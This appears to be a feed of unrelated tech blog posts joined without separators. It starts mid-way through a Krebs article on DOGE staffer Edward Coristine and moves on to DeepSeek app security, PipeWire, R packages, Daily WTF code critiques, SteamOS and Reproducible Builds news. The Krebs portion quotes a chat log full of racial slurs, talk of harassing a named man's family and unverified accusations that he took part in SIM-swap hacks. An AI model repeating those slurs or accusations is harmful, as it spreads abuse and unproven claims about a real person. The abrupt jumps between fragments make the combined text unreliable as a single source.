Rivage largely stopped posting messages on Com channels after that. Wired reports that Coristine subsequently spent three months last summer working at Neuralink, Elon Musk’s brain implant startup.
The trouble with all this is that even if someone sincerely intends to exit The Com after years of consorting with cybercriminals, they are often still subject to personal attacks, harassment and hacking long after they have left the scene.
That’s because a huge part of Com culture involves harassing, swatting and hacking other members of the community. These internecine attacks are often for financial gain, but just as frequently they are perpetrated by cybercrime groups to exact retribution from or assert dominance over rival gangs.
Experts say it is extremely difficult for former members of violent street gangs to gain a security clearance needed to view sensitive or classified information held by the U.S. government. That’s because ex-gang members are highly susceptible to extortion and coercion from current members of the same gang, and that alone presents an unacceptable security risk for intelligence agencies.
And make no mistake: The Com is the English-language cybercriminal hacking equivalent of a violent street gang. KrebsOnSecurity has published numerous stories detailing how feuds within the community periodically spill over into real-world violence.
When Coristine’s name surfaced in Wired‘s report this week, members of The Com immediately took notice. In the following segment from a February 5, 2025 chat in a Com-affiliated hosting provider, members criticized Rivage’s skills, and discussed harassing his family and notifying authorities about incriminating accusations that may or may not be true.
2025-02-05 16:29:44 UTC vperked#0 they got this nigga on indiatimes man
2025-02-05 16:29:46 UTC alexaloo#0 Their cropping is worse than AI could have done
2025-02-05 16:29:48 UTC hebeatsme#0 bro who is that
2025-02-05 16:29:53 UTC hebeatsme#0 yalla re talking about
2025-02-05 16:29:56 UTC xewdy#0 edward
2025-02-05 16:29:56 UTC .yarrb#0 rivagew
2025-02-05 16:29:57 UTC vperked#0 Rivarge
2025-02-05 16:29:57 UTC xewdy#0 diamondcdm
2025-02-05 16:29:59 UTC vperked#0 i cant spell it
2025-02-05 16:30:00 UTC hebeatsme#0 rivage
2025-02-05 16:30:08 UTC .yarrb#0 yes
2025-02-05 16:30:14 UTC hebeatsme#0 i have him added
2025-02-05 16:30:20 UTC hebeatsme#0 hes on discord still
2025-02-05 16:30:47 UTC .yarrb#0 hes focused on stroking zaddy elon
2025-02-05 16:30:47 UTC vperked#0 https://en.wikipedia.org/wiki/Edward_Coristine
2025-02-05 16:30:50 UTC vperked#0 no fucking way
2025-02-05 16:30:53 UTC vperked#0 they even made a wiki for him
2025-02-05 16:30:55 UTC vperked#0 LOOOL
2025-02-05 16:31:05 UTC hebeatsme#0 no way
2025-02-05 16:31:08 UTC hebeatsme#0 hes not a good dev either
2025-02-05 16:31:14 UTC hebeatsme#0 like????
2025-02-05 16:31:22 UTC hebeatsme#0 has to be fake
2025-02-05 16:31:24 UTC xewdy#0 and theyre saying ts
2025-02-05 16:31:29 UTC xewdy#0 like ok bro
2025-02-05 16:31:51 UTC .yarrb#0 now i wanna know what all the other devs are like…
2025-02-05 16:32:00 UTC vperked#0 “`Coristine used the moniker “bigballs” on LinkedIn and @Edwardbigballer on Twitter, according to The Daily Dot.[“`
2025-02-05 16:32:05 UTC vperked#0 LOL
2025-02-05 16:32:06 UTC hebeatsme#0 lmfaooo
2025-02-05 16:32:07 UTC vperked#0 bro
2025-02-05 16:32:10 UTC hebeatsme#0 bro
2025-02-05 16:32:17 UTC hebeatsme#0 has to be fake right
2025-02-05 16:32:22 UTC .yarrb#0 does it mention Rivage?
2025-02-05 16:32:23 UTC xewdy#0 He previously worked for NeuraLink, a brain computer interface company led by Elon Musk
2025-02-05 16:32:26 UTC xewdy#0 bro what
2025-02-05 16:32:27 UTC alexaloo#0 I think your current occupation gives you a good insight of what probably goes on
2025-02-05 16:32:29 UTC hebeatsme#0 bullshit man
2025-02-05 16:32:33 UTC xewdy#0 this nigga got hella secrets
2025-02-05 16:32:37 UTC hebeatsme#0 rivage couldnt print hello world
2025-02-05 16:32:42 UTC hebeatsme#0 if his life was on the line
2025-02-05 16:32:50 UTC xewdy#0 nigga worked for neuralink
2025-02-05 16:32:54 UTC hebeatsme#0 bullshit
2025-02-05 16:33:06 UTC Nashville Dispatch ##0000 ||@PD Ping||
2025-02-05 16:33:07 UTC hebeatsme#0 must have killed all those test pigs with some bugs
2025-02-05 16:33:24 UTC hebeatsme#0 ur telling me the rivage who failed to start a company
2025-02-05 16:33:28 UTC hebeatsme#0 https://cdn.camp
2025-02-05 16:33:32 UTC hebeatsme#0 who didnt pay for servers
2025-02-05 16:33:34 UTC hebeatsme#0 ?
2025-02-05 16:33:42 UTC hebeatsme#0 was too cheap
2025-02-05 16:33:44 UTC vperked#0 yes
2025-02-05 16:33:50 UTC hebeatsme#0 like??
2025-02-05 16:33:53 UTC hebeatsme#0 it aint adding up
2025-02-05 16:33:56 UTC alexaloo#0 He just needed to find his calling idiot.
2025-02-05 16:33:58 UTC alexaloo#0 He found it.
2025-02-05 16:33:59 UTC hebeatsme#0 bro
2025-02-05 16:34:01 UTC alexaloo#0 Cope in a river dude
2025-02-05 16:34:04 UTC hebeatsme#0 he cant make good money right
2025-02-05 16:34:08 UTC hebeatsme#0 doge is about efficiency
2025-02-05 16:34:11 UTC hebeatsme#0 he should make $1/he
2025-02-05 16:34:15 UTC hebeatsme#0 $1/hr
2025-02-05 16:34:25 UTC hebeatsme#0 and be whipped for better code
2025-02-05 16:34:26 UTC vperked#0 prolly makes more than us
2025-02-05 16:34:35 UTC vperked#0 with his dad too
2025-02-05 16:34:52 UTC hebeatsme#0 time to report him for fraud
2025-02-05 16:34:54 UTC hebeatsme#0 to donald trump
2025-02-05 16:35:04 UTC hebeatsme#0 rivage participated in sim swap hacks in 2018
2025-02-05 16:35:08 UTC hebeatsme#0 put that on his wiki
2025-02-05 16:35:10 UTC hebeatsme#0 thanks
2025-02-05 16:35:15 UTC hebeatsme#0 and in 2021
2025-02-05 16:35:17 UTC hebeatsme#0 thanks
2025-02-05 16:35:19 UTC chainofcommand#0 i dont think they’ll care tbh
Given the speed with which Musk’s DOGE team was allowed access to such critical government databases, it strains credulity that Coristine could have been properly cleared beforehand. After all, he’d recently been dismissed from a job for allegedly leaking internal company information to outsiders.
According to the national security adjudication guidelines (PDF) released by the Director of National Intelligence (DNI), eligibility determinations take into account a person’s stability, trustworthiness, reliability, discretion, character, honesty, judgment, and ability to protect classified information.
The DNI policy further states that “eligibility for covered individuals shall be granted only when facts and circumstances indicate that eligibility is clearly consistent with the national security interests of the United States, and any doubt shall be resolved in favor of national security.”
On Thursday, 25-year-old DOGE staff member Marko Elez resigned after being linked to a deleted social media account that advocated racism and eugenics. Elez resigned after The Wall Street Journalasked the White House about his connection to the account.
“Just for the record, I was racist before it was cool,” the account posted in July. “You could not pay me to marry outside of my ethnicity,” the account wrote on X in September. “Normalize Indian hate,” the account wrote the same month, in reference to a post noting the prevalence of people from India in Silicon Valley.
Elez’s resignation came a day after the Department of Justice agreed to limit the number of DOGE employees who have access to federal payment systems. The DOJ said access would be limited to two people, Elez and Tom Krause, the CEO of a company called Cloud Software Group.
Earlier today, Musk said he planned to rehire Elez after President Trump and Vice President JD Vance reportedly endorsed the idea. Speaking at The White House today, Trump said he wasn’t concerned about the security of personal information and other data accessed by DOGE, adding that he was “very proud of the job that this group of young people” are doing.
A White House official toldReuters on Wednesday that Musk and his engineers have appropriate security clearances and are operating in “full compliance with federal law, appropriate security clearances, and as employees of the relevant agencies, not as outside advisors or entities.”
NPRreports Trump added that his administration’s cost-cutting efforts would soon turn to the Education Department and the Pentagon, “where he suggested without evidence that there could be ‘trillions’ of dollars in wasted spending within the $6.75 trillion the federal government spent in fiscal year 2024.”
GOP leaders in the Republican-controlled House and Senate have largely shrugged about Musk’s ongoing efforts to seize control over federal databases, dismantle agencies mandated by Congress, freeze federal spending on a range of already-appropriated government programs, and threaten workers with layoffs.
Meanwhile, multiple parties have sued to stop DOGE’s activities. ABC News says a federal judge was to rule today on whether DOGE should be blocked from accessing Department of Labor records, following a lawsuit alleging Musk’s team sought to illegally access highly sensitive data, including medical information, from the federal government.
At least 13 state attorneys general say they plan to file a lawsuit to stop DOGE from accessing federal payment systems containing Americans’ sensitive personal information, reportsThe Associated Press.
Reuters reported Thursday that the U.S. Treasury Department had agreed not to give Musk’s team access to its payment systems while a judge is hearing arguments in a lawsuit by employee unions and retirees alleging Musk illegally searched those records.
Ars Technicawrites that The Department of Education (DoE) was sued Friday by a California student association demanding an “immediate stop” to DOGE’s “unlawfully” digging through student loan data to potentially dismantle the DoE.
For whatever reason, when I plug and unplug my Wireless Headset dongle over USB,
it is not always detected by the PulseAudio/Pipewire stack which is
running our desktop sound Linux those days. But we can fix that with a restart
of the handling daemon, see below.
In PulseAudio terminology an input device (microphone) is called a source, and
an output device a sink.
When the headset dongle is plugged in, we can see it on the USB bus:
$ lsusb | grep Headset
Bus 001 Device 094: ID 046d:0af7 Logitech, Inc. Logitech G PRO X 2 Gaming Headset
The device is detected correctly as a Human Interface Device (HID) device
$ dmesg
...
[310230.507591] input: Logitech Logitech G PRO X 2 Gaming Headset as /devices/pci0000:00/0000:00:14.0/usb1/1-1/1-1.1/1-1.1.4/1-1.1.4:1.3/0003:046D:0AF7.0060/input/input163
[310230.507762] hid-generic 0003:046D:0AF7.0060: input,hiddev2,hidraw11: USB HID v1.10 Device [Logitech Logitech G PRO X 2 Gaming Headset] on usb-0000:00:14.0-1.1.4/input
However it is not seen in the list of sources / sinks of PulseAudio:
This unfriendly list shows my docking station, which as a small jack connector
for a wired cable, the built in speaker of my laptop, and a blutooth headset.
If I restart Pipewire,
$ systemctl --user restart pipewire
then the headset appears as possible audio output.
And test some recording, you will hear the output around one second after the
speaking (yes that is recorded audio sent over a Unix pipe for playing !):
# don't do this when the output is a speaker, this will create audio feedback (larsen effect)
$ arecord -f cd - | aplay
Kaspersky is reporting on a new type of smartphone malware.
The malware in question uses optical character recognition (OCR) to review a device’s photo library, seeking screenshots of recovery phrases for crypto wallets. Based on their assessment, infected Google Play apps have been downloaded more than 242,000 times. Kaspersky says: “This is the first known case of an app infected with OCR spyware being found in Apple’s official app marketplace.”
The still very new package zigg which
arrived on CRAN a week ago just
received a micro-update at CRAN. zigg provides
the Ziggurat
pseudo-random number generator (PRNG) for Normal, Exponential and
Uniform draws proposed by Marsaglia and
Tsang (JSS, 2000),
and extended by Leong et al. (JSS, 2005). This PRNG
is lightweight and very fast: on my machine speedups for the
Normal, Exponential, and Uniform are on the order of 7.4, 5.2 and 4.7
times faster than the default generators in R as illustrated in the benchmark
chart borrowed from the git repo.
As wrote last week in the initial
announcement, I had picked up their work in package RcppZiggurat
and updated its code for the 64-buit world we now live in. That package
alredy provided the Normal generator along with several competing
implementations which it compared rigorously and timed them. As one of
the generators was based on the GNU GSL via the
implementation of Voss, we always ended
up with a run-time dependency on the GSL too. No more: this new package
is zero-depedency, zero-suggsts and hence very easy to deploy.
Moreover, we also include a demonstration of four distinct ways of
accessing the compiled code from another R package: pure and straight-up
C, similarly pure C++, inclusion of the header in C++ as well as via Rcpp. The other advance is the
resurrection of the second generator for the Exponential distribution.
And following Burkardt we expose the
Uniform too. The main upside of these generators is their excellent
speed as can be seen in the comparison the default R generators
generated by the example script timings.R:
Needless to say, speed is not everything. This PRNG comes the time of
32-bit computing so the generator period is likely to be shorter than
that of newer high-quality generators. If in doubt, forgo speed and
stick with the high-quality default generators.
This release essentially just completes the DESCRIPTION file and
README.md now that this is a CRAN package. The short NEWS entry
follows.
Changes in version 0.0.2
(2025-02-07)
Complete DESCRIPTION and README.md following initial CRAN
upload
I have a feeling we're going to be seeing a lot of AI WTFerry at this site for a while, and fewer stupid online sales copy booboos. For today, here we go:
Jet-setter
Stewart
wants to sell a pound, but he's going to have to cover some ground first.
"Looks like Google are trying very hard to encourage me to stop using their search engine. Perhaps they want me to use chatGPT? I just can't fathom how it got this so wrong."
Tim R.
proves that AIs aren't immune to the general flubstitution error category either.
"I'm not quite sure what's going on here - there were 5 categories each with the same [insert content here] placeholder. Maybe the outer text is not AI generated and the developers forgot to actually call the AI, or maybe the AI has been trained on so much placeholder source code it thought it was generating what I wanted to see."
"Crazy Comcast Calendar Corruption!" complains
B.J.H.
"No wonder I didn't get birthday gifts -- my birth month
has been sloughed away. But they still charged me for the months that don't exist." Hey, they only charged you for 12 months at least. Maybe they just picked twelve at random.
Educator
Manuel H.
"Publishing a session recording in [open-source] BigBlueButton seems to be a task for logicians: Should it be public, or protected, or both? Or should it rather be published instead of public? Or better not published at all?"
A little translation explanation: the list of options provided would in English be "Public/Protected, Public, Protected, Published, Unpublished". I have no idea what the differences mean.
And the pièce de résistance from
Mark Whybird
"I've always hated click here as a UX antipattern, but Dell have managed to make it even worse." Or maybe better? This is hysterical.
[Advertisement]
Keep all your packages and Docker containers in one place, scan for vulnerabilities, and control who can access different feeds. ProGet installs in minutes and has a powerful free version with a lot of great features that you can upgrade when ready.Learn more.
Author: Deborah Sale-Butler It was a great place to live. Tons of space to spin out a web. And the local food was spectacular. I mean, you could get anything in that neighborhood: dragonflies, blowflies, sometimes even a big, fat, juicy moth. De-lish! I can honestly say, up until Tuesday I was an arachnid with […]
New mobile apps from the Chinese artificial intelligence (AI) company DeepSeek have remained among the top three “free” downloads for Apple and Google devices since their debut on Jan. 25, 2025. But experts caution that many of DeepSeek’s design choices — such as using hard-coded encryption keys, and sending unencrypted user and device data to Chinese companies — introduce a number of glaring security and privacy risks.
Public interest in the DeepSeek AI chat apps swelled following widespread media reports that the upstart Chinese AI firm had managed to match the abilities of cutting-edge chatbots while using a fraction of the specialized computer chips that leading AI companies rely on. As of this writing, DeepSeek is the third most-downloaded “free” app on the Apple store, and #1 on Google Play.
DeepSeek’s rapid rise caught the attention of the mobile security firm NowSecure, a Chicago-based company that helps clients screen mobile apps for security and privacy threats. In a teardown of the DeepSeek app published today, NowSecure urged organizations to remove the DeepSeek iOS mobile app from their environments, citing security concerns.
NowSecure founder Andrew Hoog said they haven’t yet concluded an in-depth analysis of the DeepSeek app for Android devices, but that there is little reason to believe its basic design would be functionally much different.
Hoog told KrebsOnSecurity there were a number of qualities about the DeepSeek iOS app that suggest the presence of deep-seated security and privacy risks. For starters, he said, the app collects an awful lot of data about the user’s device.
“They are doing some very interesting things that are on the edge of advanced device fingerprinting,” Hoog said, noting that one property of the app tracks the device’s name — which for many iOS devices defaults to the customer’s name followed by the type of iOS device.
The device information shared, combined with the user’s Internet address and data gathered from mobile advertising companies, could be used to deanonymize users of the DeepSeek iOS app, NowSecure warned. The report notes that DeepSeek communicates with Volcengine, a cloud platform developed by ByteDance (the makers of TikTok), although NowSecure said it wasn’t clear if the data is just leveraging ByteDance’s digital transformation cloud service or if the declared information share extends further between the two companies.
Image: NowSecure.
Perhaps more concerning, NowSecure said the iOS app transmits device information “in the clear,” without any encryption to encapsulate the data. This means the data being handled by the app could be intercepted, read, and even modified by anyone who has access to any of the networks that carry the app’s traffic.
“The DeepSeek iOS app globally disables App Transport Security (ATS) which is an iOS platform level protection that prevents sensitive data from being sent over unencrypted channels,” the report observed. “Since this protection is disabled, the app can (and does) send unencrypted data over the internet.”
Hoog said the app does selectively encrypt portions of the responses coming from DeepSeek servers. But they also found it uses an insecure and now deprecated encryption algorithm called 3DES (aka Triple DES), and that the developers had hard-coded the encryption key. That means the cryptographic key needed to decipher those data fields can be extracted from the app itself.
There were other, less alarming security and privacy issues highlighted in the report, but Hoog said he’s confident there are additional, unseen security concerns lurking within the app’s code.
“When we see people exhibit really simplistic coding errors, as you dig deeper there are usually a lot more issues,” Hoog said. “There is virtually no priority around security or privacy. Whether cultural, or mandated by China, or a witting choice, taken together they point to significant lapse in security and privacy controls, and that puts companies at risk.”
Apparently, plenty of others share this view. Axiosreported on January 30 that U.S. congressional offices are being warned not to use the app.
“[T]hreat actors are already exploiting DeepSeek to deliver malicious software and infect devices,” read the notice from the chief administrative officer for the House of Representatives. “To mitigate these risks, the House has taken security measures to restrict DeepSeek’s functionality on all House-issued devices.”
TechCrunchreports that Italy and Taiwan have already moved to ban DeepSeek over security concerns. Bloombergwrites that The Pentagon has blocked access to DeepSeek. CNBCsaysNASA also banned employees from using the service, as did the U.S. Navy.
Beyond security concerns tied to the DeepSeek iOS app, there are indications the Chinese AI company may be playing fast and loose with the data that it collects from and about users. On January 29, researchers at Wizsaid they discovered a publicly accessible database linked to DeepSeek that exposed “a significant volume of chat history, backend data and sensitive information, including log streams, API secrets, and operational details.”
“More critically, the exposure allowed for full database control and potential privilege escalation within the DeepSeek environment, without any authentication or defense mechanism to the outside world,” Wiz wrote. [Full disclosure: Wiz is currently an advertiser on this website.]
KrebsOnSecurity sought comment on the report from DeepSeek and from Apple. This story will be updated with any substantive replies.
Announcing the Picks and Shovels book tour (permalink)
My next novel, Picks and Shovels, is officially out in the US and Canada on Feb 17, and I’m about to leave on a 20+ city book-tour, which means there’s a nonzero chance I’ll be in a city near you between now and the end of the spring!
Picks and Shovels is a standalone novel starring Martin Hench – my hard-charging, two-fisted, high-tech forensic accountant – in his very first adventure, in the early 1980s. It’s a story about the Weird PC era, when no one was really certain what shape PCs should be, who should make them, who should buy them, and what they’re for. It features a commercial war between two very different PC companies.
The first one, Fidelity Computing, is a predatory multi-level marketing faith scam, run by a Mormon bishop, a Catholic priest, and an orthodox rabbi. Fidelity recruits people to exploit members of their faith communities by selling them third-rate PCs that are designed as rip-off lock-ins, forcing you to buy special floppies for their drives, special paper for their printers, and to use software that is incompatible with everything else in the world.
The second PC company is Computing Freedom, a rebel alliance of three former Fidelity Computing sales-managers: an orthodox woman who’s been rejected by her family after coming out as queer; a Mormon woman who’s rejected the Church over its opposition to the Equal Rights Amendment, and a nun who’s quit her order to join the Liberation Theology movement in the struggle for human rights in America’s dirty wars.
In the middle of it all is Martin Hench, coming of age in San Francisco during the PC bubble, going to Dead Kennedys shows, getting radicalized by ACT UP!, and falling in love – all while serving as CFO and consigliere to Computing Freedom, as a trade war turns into a shooting war, and they have to flee for their lives.
The book’s had fantastic early reviews, with endorsements from computer historians like Steven Levy (Hackers), Claire Evans (Broad-Band), John Markoff (What the Doormouse Said) and Dan’l Lewin (CEO of the Computer History Museum). Stephen Fry raved that he “hugely enjoyed” the “note perfect,” “superb” story.
And I’m about to leave on tour! I have nineteen confirmed dates, and two nearly confirmed dates, and there’s more to come! I hope you’ll consider joining me at one of these events. I’ve got a bunch of fantastic conversation partners joining me onstage and online, and the bookstores that are hosting me are some of my favorite indie booksellers in the world.
VIRTUAL (Feb 15):
YANIS VAROUFAKIS, sponsored by Jacobin and hosted by David Moscrop, 10AM Pacific, 1PM Eastern, 6PM UK, 7PM CET https://www.youtube.com/watch?v=xkIDep7Z4LM
PDX, Jun 20 (TBC):
Powell’s Books (date and time to be confirmed)
I’m also finalizing plans for one or two dates in NEW ZEALAND at the end of April, as well as a ATLANTA date, likely on March 26.
I really hope you’ll come out and say hello. I know these are tough times. Hanging out with nice people who care about the same stuff as you is a genuine tonic.
Armadillo is a powerful
and expressive C++ template library for linear algebra and scientific
computing. It aims towards a good balance between speed and ease of use,
has a syntax deliberately close to Matlab, and is useful for algorithm
development directly in C++, or quick conversion of research code into
production environments. RcppArmadillo
integrates this library with the R environment and language–and is
widely used by (currently) 1215 other packages on CRAN, downloaded 38.2 million
times (per the partial logs from the cloud mirrors of CRAN), and the CSDA paper (preprint
/ vignette) by Conrad and myself has been cited 612 times according
to Google Scholar.
Conrad released a minor
version 14.2.3 yesterday. As it has been two months since the last
minor release, we prepared a new version for CRAN too which arrived there early
this morning.
The changes since the last CRAN release are summarised
below.
Changes in
RcppArmadillo version 14.2.3-1 (2025-02-05)
Upgraded to Armadillo release 14.2.3 (Smooth Caffeine)
Minor fix for declaration of xSYCON and
xHECON functions in LAPACK
Cookiecutter is a tool for building coding project templates. It’s often used to provide a scaffolding to build lots of similar project. I’ve seen it used to create Symfony projects and several cloud infrastructures deployed with Terraform. This tool was useful to accelerate the creation of new projects.
Since these templates were bound to evolve, the teams providing these template relied on cruft to update the code provided by the template in their user’s code. In other words, they wanted their users to apply a diff of the template modification to their code.
At the beginning, all was fine. But problems began to appear during the lifetime of these projects.
What went wrong ?
In both cases, we had the following scenario:
user team:
creates new project with cookiecutter template
makes modification on their code, including on code provided by template
meanwhile, provider team:
makes modifications to cookiecutter template
releases new template version
asks his users to update code brought by template using cruft
user team then:
runs cruft to update template code
discovers a lot of code conflicts (similar to git merge conflicts)
often rolls back cruft update and gives up on template update
User team giving up on updates is a major problem because these update may bring security or compliance fixes.
Note that code conflicts seen with cruft are similar to git merge conflicts, but harder to resolve because, unlike with a git merge, there’s no common ancestor, so 3-way merges are not possible.
From an organisation point of view, the main problem is the ambiguous ownership of the functionalities brought by template code: who own this code ? The provider team who writes the template or the user team who owns the repository of the code generated from the template ? Conflicts are bound to happen. �
Possible solutions to get out of this tar pit:
Assume that template are one shot. Template update are not practical in the long run.
Make sure that template are as thin as possible. They should contain minimal logic.
Move most if not all logic in separate libraries or scripts that are owned by provider team. This way update coming from provider team can be managed like external dependencies by upgrading the version of a dependency.
Of course your users won’t be happy to be faced with a manual migration from the old big template to the new one with external dependencies. On the other hand, this may be easier to sell than updates based on cruft since the painful work will happen once. Further updates will be done by incrementing dependency versions (which can be automated with renovate).
If many projects are to be created with this template, it may be more practical to provide use a CLI that will create a skeleton project. See for instance terragrunt scaffold command.
My name is Dominique Dumont, I’m a devops freelance. You can find the devops and audit services I propose on my website or reach out to me on LinkedIn.
We are pleased to announce that Proxmox has
committed to sponsor DebConf25 as a
Platinum Sponsor.
Proxmox develops powerful, yet easy-to-use Open Source server software. The
product portfolio from Proxmox, including server virtualization, backup, and
email security, helps companies of any size, sector, or industry to simplify
their IT infrastructures. The Proxmox solutions are based on the great Debian
platform, and we are happy that we can give back to the community by sponsoring
DebConf25.
With this commitment as Platinum Sponsor, Proxmox is contributing to the Debian
annual Developers' conference, directly supporting the progress of Debian and
Free Software. Proxmox contributes to strengthen the community that
collaborates on Debian projects from all around the world throughout all of
the year.
Thank you very much, Proxmox, for your support of DebConf25!
Become a sponsor too!
DebConf25 will take place from 14 to 20
July 2025 in Brest, France, and will be preceded by DebCamp, from 7 to 13
July 2025.
Sammy's company "jumped on the Ruby on Rails bandwagon since there was one on which to jump", and are still very much a Rails shop. The company has been around for thirty years, and in that time has seen plenty of ups and downs. During one of those "ups", management decided they needed to scale up, both in terms of staffing and in terms of client base- so they hired an offshore team to promote international business and add to their staffing.
A "down" followed not long after, and the offshore team was disbanded. So Sammy inherited the code.
I know I'm generally negative on ORM systems, and that includes Rails, but I want to stress: they're fine if you stay on the happy path. If your data access patterns are simple (which most applications are just basic CRUD!) there's nothing wrong with using an ORM. But if you're doing that, you need to use the ORM. Which is not what the offshore team did. For example:
classRequest < ActiveRecord::Basedefself.get_this_years_request_ids(facility_id) # There are several other methods that are *exactly* the same, except for the year
requests = Request.where("requests.id in (select t.id from requests as t # what is the purpose of this subquery?
where t.unit_id=token_requests.unit_id and t.facility_id=token_requests.facility_id
and t.survey_type = '#{TokenRequest::SURVEY_TYPE}' # why is SURVEY_TYPE a constant?
and EXTRACT( YEAR FROM created_at) = EXTRACT(YEAR FROM current_timestamp)
order by t.id desc) and token_requests.facility_id = #{facility_id.to_i} # so we get all the requests by year, then by by ???
and token_requests.survey_type = '#{Request::SURVEY_TYPE}'")
Comments from Sammy.
Now, if we just look at the signature of the method, it seems like this should be a pretty straightforward query: get all of the request IDs for a given facility ID, within a certain time range.
And Sammy has helpfully provided a version of this code which does the same thing, but in a more "using the tools correctly" way:
Now, I don't know Ruby well enough to be sure, but the DateTime.new(year.to_i) whiffs a bit of some clumsy date handling, but that may be a perfectly cromulent idiom in Ruby. But this code is pretty clear about what it's doing: finding request objects for a given facility within a given year. Why one uses Request and the other uses TokenRequest is a mystery to me- I' m going to suspect some bad normalization in the database or errors in how Sammy anonymized the code. That's neither here nor there.
Once we've gotten our list of requests, we need to process them to output them. Here's how the offshore code converted the list into a comma delimited string, wrapped in parentheses.
Look, if the problem is to "join a string with delimiters" and you write code that looks like this, just delete your hard drive and start over. You need extra help.
We start by defaulting to (-1) which is presumably a "no results" indicator. But if we have results, we'll iterate across those results. If our result string is non-empty (which it definitely is non-empty), we append a comma (giving us (-1),). Then we append the current token ID, giving us (-1),5, for example. Once we've exhausted all the returned IDs, we wrap the whole thing in parentheses.
So, this code is wrong- it's only supposed to return (-1) when there are no results, but as written, it embeds that in the results. Presumably the consuming code is able to handle that error gracefully, since the entire project works.
Sammy provides us a more idiomatic (and readable) version of the code which also works correctly:
I'll be honest, I hate the fact that this is returning a stringly-typed list of integers, but since I don't know the context, I'll let that slide. At the very least, this is a better example of what joining a list of values into a string should look like.
Sammy writes:
It seems these devs never took the time to learn the language. After asking around a bit, I found out they all came from a Java background. Most of this code seems to be from a VB playbook, though.
That's a huge and undeserved insult to Visual Basic programmers, Sammy. Even they're not that bad.
[Advertisement]
Utilize BuildMaster to release your software with confidence, at the pace your business demands. Download today!
Author: Eric San Juan She reached down for the water bottle at her side, remembered it was empty only when she brought to her lips, sighed, and hung her head. “I should have stayed in the city.” She knew she was wrong about that, of course. The city is where it all started. Things were […]
If you use SteamOS and you like to install third-party tools or modify the system-wide configuration some of your changes might be lost after an OS update. Read on for details on why this happens and what to do about it.
As you all know SteamOS uses an immutable root filesystem and users are not expected to modify it because all changes are lost after an OS update.
However this does not include configuration files: the /etc directory is not part of the root filesystem itself. Instead, it’s a writable overlay and all modifications are actually stored under /var (together with all the usual contents that go in that filesystem such as logs, cached data, etc).
/etc contains important data that is specific to that particular machine like the configuration of known network connections, the password of the main user and the SSH keys. This configuration needs to be kept after an OS update so the system can keep working as expected. However the update process also needs to make sure that other changes to /etc don’t conflict with whatever is available in the new version of the OS, and there have been issues due to some modifications unexpectedly persisting after a system update.
SteamOS 3.6 introduced a new mechanism to decide what to to keep after an OS update, and the system now keeps a list of configuration files that are allowed to be kept in the new version. The idea is that only the modifications that are known to be important for the correct operation of the system are applied, and everything else is discarded1.
However, many users want to be able to keep additional configuration files after an OS update, either because the changes are important for them or because those files are needed for some third-party tool that they have installed. Fortunately the system provides a way to do that, and users (or developers of third-party tools) can add a configuration file to /etc/atomic-update.conf.d, listing the additional files that need to be kept.
There is an example in /etc/atomic-update.conf.d/example-additional-keep-list.conf that shows what this configuration looks like.
Sample configuration file for the SteamOS updater
Developers who are targeting SteamOS can also use this same method to make sure that their configuration files survive OS updates. As an example of an actual third-party project that makes use of this mechanism you can have a look at the DeterminateSystems Nix installer:
As usual, if you encounter issues with this or any other part of the system you can check the SteamOS issue tracker. Enjoy!
A copy is actually kept under /etc/previous to give the user the chance to recover files if necessary, and up to five previous snapshots are kept under /var/lib/steamos-atomupd/etc_backup︎
Our monthly reports outline what we’ve been up to over the past month and highlight items of news from elsewhere in the world of software supply-chain security when relevant. As usual, though, if you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website.
The last few months saw the introduction of reproduce.debian.net. Announced at the recent Debian MiniDebConf in Toulouse, reproduce.debian.net is an instance of rebuilderd operated by the Reproducible Builds project. Powering that is rebuilderd, our server designed monitor the official package repositories of Linux distributions and attempt to reproduce the observed results there.
Giacomo Benedetti, Oreofe Solarin, Courtney Miller, Greg Tystahl, William Enck, Christian Kästner, Alexandros Kapravelos, Alessio Merlo and Luca Verderame published an interesting article recently. Titled An Empirical Study on Reproducible Packaging in Open-Source Ecosystem, the abstract outlines its optimistic findings:
[We] identified that with relatively straightforward infrastructure configuration and patching of build tools, we can achieve very high rates of reproducible builds in all studied ecosystems. We conclude that if the ecosystems adopt our suggestions, the build process of published packages can be independently confirmed for nearly all packages without individual developer actions, and doing so will prevent significant future software supply chain attacks.
Answering strongly in the affirmative, the article’s abstract reads as follows:
In this work, we perform the first large-scale study of bitwise reproducibility, in the context of the Nix functional package manager, rebuilding 709,816 packages from historical snapshots of the nixpkgs repository[. We] obtain very high bitwise reproducibility rates, between 69 and 91% with an upward trend, and even higher rebuildability rates, over 99%. We investigate unreproducibility causes, showing that about 15% of failures are due to embedded build dates. We release a novel dataset with all build statuses, logs, as well as full diffoscopes: recursive diffs of where unreproducible build artifacts differ.
As above, the entire PDF of the article is available to view online.
Distribution work
There as been the usual work in various distributions this month, such as:
10+ reviews of Debian packages were added, 11 were updated and 10 were removed this month adding to our knowledge about identified issues. A number of issue types were updated also.
The FreeBSD Foundation announced that “a planned project to deliver zero-trust builds has begun in January 2025”. Supported by the Sovereign Tech Agency, this project is centered on the various build processes, and that the “primary goal of this work is to enable the entire release process to run without requiring root access, and that build artifacts build reproducibly – that is, that a third party can build bit-for-bit identical artifacts.” The full announcement can be found online, which includes an estimated schedule and other details.
Following-up to a substantial amount of previous work pertaining the Sphinx documentation generator, James Addison asked a question pertaining to the relationship between SOURCE_DATE_EPOCH environment variable and testing that generated a number of replies.
Adithya Balakumar of Toshiba asked a question about whether it is possible to make ext4 filesystem images reproducible. Adithya’s issue is that even the smallest amount of post-processing of the filesystem results in the modification of the “Last mount” and “Last write” timestamps.
FUSE (Filesystem in USErspace) filesystems such as disorderfs do not delete files from the underlying filesystem when they are deleted from the overlay. This can cause seemingly straightforward tests — for example, cases that expect directory contents to be empty after deletion is requested for all files listed within them — to fail.
Upstream patches
The Reproducible Builds project detects, dissects and attempts to fix as many currently-unreproducible packages as possible. We endeavour to send all of our patches upstream where appropriate. This month, we wrote a large number of such patches, including:
diffoscope is our in-depth and content-aware diff utility that can locate and diagnose reproducibility issues. This month, Chris Lamb made the following changes, including preparing and uploading versions 285, 286 and 287 to Debian:
Security fixes:
Validate the --css command-line argument to prevent a potential Cross-site scripting (XSS) attack. Thanks to Daniel Schmidt from SRLabs for the report. […]
Prevent XML entity expansion attacks. Thanks to Florian Wilkens from SRLabs for the report.. […][…]
Print a warning if we have disabled XML comparisons due to a potentially vulnerable version of pyexpat. […]
Bug fixes:
Correctly identify changes to only the line-endings of files; don’t mark them as Ordering differences only. […]
When passing files on the command line, don’t call specialize(…) before we’ve checked that the files are identical or not. […]
